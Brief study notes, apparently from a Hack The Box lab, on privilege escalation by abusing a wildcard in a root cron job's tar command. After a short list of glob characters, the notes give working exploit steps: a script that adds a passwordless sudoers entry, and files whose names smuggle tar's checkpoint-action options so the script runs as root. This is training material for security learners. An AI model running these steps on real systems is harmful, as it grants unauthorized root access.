wildcard-abuse-tar
? matches a single char
* any number
[] brackets enclose characters and can match any single one at the defined position.
~ user home directory
- A hyper with brackets will denote a range of characters.#
#
mh dom mon dow command
*/01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.shecho "" > "--checkpoint-action=exec=sh root.sh"echo "" > --checkpoint=1ls -lasudo -lLast updated